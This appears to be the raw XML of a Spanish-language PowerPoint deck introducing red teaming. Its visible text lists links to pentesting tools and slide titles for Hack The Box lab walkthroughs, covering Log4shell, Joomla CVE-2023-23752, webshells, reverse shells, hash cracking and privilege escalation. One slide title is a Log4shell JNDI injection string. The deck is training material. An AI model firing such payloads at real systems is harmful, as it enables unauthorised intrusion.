          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603768" y="2068334"/>
            <a:ext cx="8134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Sistema Operativo Linux</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:hlinkClick r:id="rId2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.kali.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.parrotsec.org/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagen 7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951AF1C3-1D27-0EE8-25D5-0EB7371AC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8" y="1811975"/>
            <a:ext cx="1524794" cy="143604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D060855E-94C7-0C73-592D-1D328D6FE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39" y="1788894"/>
            <a:ext cx="1524794" cy="1435100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735FC49-AB82-258F-6C00-87B5EB7BC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3317218"/>
            <a:ext cx="1524794" cy="14351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F102F98-4846-6D29-8E12-A59119F486A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603768" y="3491209"/>
            <a:ext cx="8134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Enumeración de máquinas y puertos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://www.kali.org/tools/hping3/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://nmap.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> 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D3F2AA7-B5F1-C658-7E17-BD9D269D36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311" y="3248024"/>
            <a:ext cx="1409701" cy="1409701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media">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4EE4B8-71D3-6B81-2120-2AA4315E19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25" y="4845542"/>
            <a:ext cx="1828093" cy="54011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9C1C4A9-90BB-FC41-B91B-D8A0C3CAA11F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3584180" y="4845542"/>
            <a:ext cx="8134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Escáneres de vulnerabilidades</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://github.com/projectdiscovery/nuclei</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://www.tenable.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>https://github.com/sullo/nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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3DF2F733-6226-E093-4690-51F0244F4E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46" y="5503816"/>
            <a:ext cx="1801672" cy="477975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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81937F83-E6D5-67C4-4A2A-3AA0BC1A3E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1" y="4859169"/>
            <a:ext cx="1113235" cy="1047751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ABA6445D-AFA9-A27C-B69B-925B538A9ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581357" y="6830711"/>
            <a:ext cx="8134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Descubrimiento subdominios y subdirectorios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://github.com/OJ/gobuster</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://github.com/ffuf/ffuf</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>https://github.com/maurosoria/dirsearch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>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B445BF9-7666-9DB8-497E-EAF5296C76EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11990100" y="4091373"/>
            <a:ext cx="4005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Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>https://portswigger.net/burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>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0FB43CE-19CA-DAEE-4DAC-9FA86A614906}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11948173" y="5262297"/>
            <a:ext cx="40057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Cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>https://hashcat.net/hashcat/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId21"/>
              </a:rPr>
              <a:t>https://www.openwall.com/john/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Imagen 37" descr="Imagen que contiene Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB9B2CE4-35DD-0BD3-B857-E695712093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162" y="5365172"/>
            <a:ext cx="1102300" cy="1102300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="40" name="Imagen 39" descr="Icono&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2623DC16-4AB1-64DF-066B-398C667F5A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441" y="5365172"/>
            <a:ext cx="2194908" cy="1097454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Imagen 41" descr="Logotipo&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13466AFB-15E0-85B9-0E46-ECE27A6B66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823" y="3827364"/>
            <a:ext cx="1852350" cy="1097454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524E0D1B-3FE6-F4AE-2415-617A982E05B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11990099" y="6904213"/>
            <a:ext cx="4005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Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId25"/>
              </a:rPr>
              <a:t>https://www.metasploit.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Imagen 4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FE7A54E-46B1-0BD4-8A63-6138B5590B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005" y="6753372"/>
            <a:ext cx="1852350" cy="992763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954ABC84-2D22-C319-7EDE-27AE594DF29C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11919206" y="2781512"/>
            <a:ext cx="40057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Escalada de privilegios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0">
                <a:hlinkClick r:id="rId27"/>
              </a:rPr>
              <a:t>https://github.com/carlospolop/PEASS-ng/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Imagen 49" descr="Diagrama&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A06DD61-3EE0-F52B-6D5A-81521E3F9BA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88" y="2713750"/>
            <a:ext cx="3357263" cy="1047751"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Imagen 53" descr="Logotipo&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE2F51C2-5848-47D5-7008-B1F86C40DF7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" y="6505629"/>
            <a:ext cx="1938169" cy="904479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Imagen 55" descr="Imagen que contiene cuarto&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EDE268-A90E-C00A-676B-6E60D2DE12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03" y="6326133"/>
            <a:ext cx="1294202" cy="1218072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Imagen 59" descr="Logotipo&#10;&#10;Descripción generada automáticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F8F8C29-E38D-B8C3-879B-616ABC84D82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35525" r="9072" b="37080"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="389740" y="7491107"/>
            <a:ext cx="2976543" cy="6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91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33FAC-ED8F-5AC8-B373-A94FCB84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DB04DC8E-4E84-8300-D724-138FFD870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7200" y="6305275"/>
            <a:ext cx="7315200" cy="3657600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://app.hackthebox.com/machines/587</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2400" dirty="0"/>
              <a:t>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6E1DC7-E53A-A152-70AC-69C1E877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2838725"/>
            <a:ext cx="7150100" cy="3545666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190355-AE67-1D5C-9C50-128610DBE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741518"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1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50e0168-5d46-4d7d-8a73-9a832b308c1e" xsi:nil="true"/>
    <lcf76f155ced4ddcb4097134ff3c332f xmlns="9ea90241-f44b-4fa5-bda2-dd74206fe69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9F88FDB34F734E8CE3735F0934EC94" ma:contentTypeVersion="17" ma:contentTypeDescription="Crear nuevo documento." ma:contentTypeScope="" ma:versionID="7c647c5a4e64b69da90000f7beb662e7">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="9ea90241-f44b-4fa5-bda2-dd74206fe69a" xmlns:ns3="950e0168-5d46-4d7d-8a73-9a832b308c1e" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="f5996caa41af1b10c948999456438f70" ns2:_="" ns3:_="">
    <xsd:import namespace="9ea90241-f44b-4fa5-bda2-dd74206fe69a"/>
    <xsd:import namespace="950e0168-5d46-4d7d-8a73-9a832b308c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90241-f44b-4fa5-bda2-dd74206fe6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dece1a9e-e829-42a2-80ca-4303f8678d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e0168-5d46-4d7d-8a73-9a832b308c1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53a8c8c7-c9ea-4a54-b57c-71a6a86090df}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="950e0168-5d46-4d7d-8a73-9a832b308c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31A2F8-AA86-4CCF-8AF9-A33CBC0182F5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50e0168-5d46-4d7d-8a73-9a832b308c1e"/>
    <ds:schemaRef ds:uri="http://www.w3.org/XML/1998/namespace"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="9ea90241-f44b-4fa5-bda2-dd74206fe69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CDAAFD0-6593-4170-BC5D-609C7497BC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7DA3FF-FA0D-41D3-9D7B-860D53910C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a90241-f44b-4fa5-bda2-dd74206fe69a"/>
    <ds:schemaRef ds:uri="950e0168-5d46-4d7d-8a73-9a832b308c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c4caec11-b272-4abb-aa21-6454bfced6b5}" enabled="1" method="Privileged" siteId="{14cb4ab4-62b8-45a2-a944-e225383ee1f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7580</TotalTime>
  <Words>975</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Personalizado</PresentationFormat>
  <Paragraphs>167</Paragraphs>
  <Slides>40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Calibri</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>1_INETUM</vt:lpstr>
      <vt:lpstr>Diseño personalizado</vt:lpstr>
      <vt:lpstr>Introducción práctica al Red Team</vt:lpstr>
      <vt:lpstr>$ whoami</vt:lpstr>
      <vt:lpstr>Contenido</vt:lpstr>
      <vt:lpstr>Cybersecurity Teams</vt:lpstr>
      <vt:lpstr>Pentesting vs Red Team </vt:lpstr>
      <vt:lpstr>Fases Pentesting</vt:lpstr>
      <vt:lpstr>¿Cómo empezar en el Hacking?</vt:lpstr>
      <vt:lpstr>Herramientas</vt:lpstr>
      <vt:lpstr>https://app.hackthebox.com/machines/587  </vt:lpstr>
      <vt:lpstr>¿Qué tenemos delante?</vt:lpstr>
      <vt:lpstr>No me va la web </vt:lpstr>
      <vt:lpstr>Mapeamos DNS local</vt:lpstr>
      <vt:lpstr>¿Qué tenemos delante?</vt:lpstr>
      <vt:lpstr>Minecraft, ¿jugamos?</vt:lpstr>
      <vt:lpstr>Script que veo, script que ejecuto, ¿no?</vt:lpstr>
      <vt:lpstr>Vale, ya lo tengo, ¿y ahora?</vt:lpstr>
      <vt:lpstr>Minecraft.exe not found</vt:lpstr>
      <vt:lpstr>${jndi:ldap://localhost:1389/a}</vt:lpstr>
      <vt:lpstr>Antes de correr … ¡leer!</vt:lpstr>
      <vt:lpstr>Ahora sí, ¡Log4shell!</vt:lpstr>
      <vt:lpstr>¿Y ahora, qué?</vt:lpstr>
      <vt:lpstr>A la Kali a decompilar</vt:lpstr>
      <vt:lpstr>A la Kali a decompilar</vt:lpstr>
      <vt:lpstr>A la Kali a decompilar</vt:lpstr>
      <vt:lpstr>Escalando privilegios</vt:lpstr>
      <vt:lpstr>https://app.hackthebox.com/machines/577 </vt:lpstr>
      <vt:lpstr>Escaneando</vt:lpstr>
      <vt:lpstr>¿Algo en la web principal?</vt:lpstr>
      <vt:lpstr>¿No será un vhost?</vt:lpstr>
      <vt:lpstr>Joomla! ¿Podemos entrar?</vt:lpstr>
      <vt:lpstr>CVE-2023-23752</vt:lpstr>
      <vt:lpstr>Somos “Lewis”, ¿webshell?</vt:lpstr>
      <vt:lpstr>Webshell y reverseshell</vt:lpstr>
      <vt:lpstr>Upgradeando la shell</vt:lpstr>
      <vt:lpstr>Accediendo a la base de datos con “Lewis”</vt:lpstr>
      <vt:lpstr>Crackeando el hash de Logan</vt:lpstr>
      <vt:lpstr>Accediendo como “Logan”</vt:lpstr>
      <vt:lpstr>Explotando CVE-2023-1326</vt:lpstr>
      <vt:lpstr>Explotando CVE-2023-1326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práctica al Red Team</dc:title>
  <dc:creator>Nieves-Sanchez Victor</dc:creator>
  <cp:lastModifiedBy>Nieves-Sanchez Victor</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-17T14:54:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-19T12:46:12Z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2020-09-17T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Creator">
    <vt:lpwstr>Adobe InDesign 15.1 (Macintosh)</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="LastSaved">
    <vt:filetime>2020-09-17T00:00:00Z</vt:filetime>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="ContentTypeId">
    <vt:lpwstr>0x010100679F88FDB34F734E8CE3735F0934EC94</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_Enabled">
    <vt:lpwstr>true</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_SetDate">
    <vt:lpwstr>2022-01-28T08:51:10Z</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_Method">
    <vt:lpwstr>Privileged</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_Name">
    <vt:lpwstr>Internal</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_SiteId">
    <vt:lpwstr>14cb4ab4-62b8-45a2-a944-e225383ee1f9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="11" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_ActionId">
    <vt:lpwstr>02f95508-21dc-4933-baba-e951ecb77238</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="12" name="MSIP_Label_c4caec11-b272-4abb-aa21-6454bfced6b5_ContentBits">
    <vt:lpwstr>0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="13" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>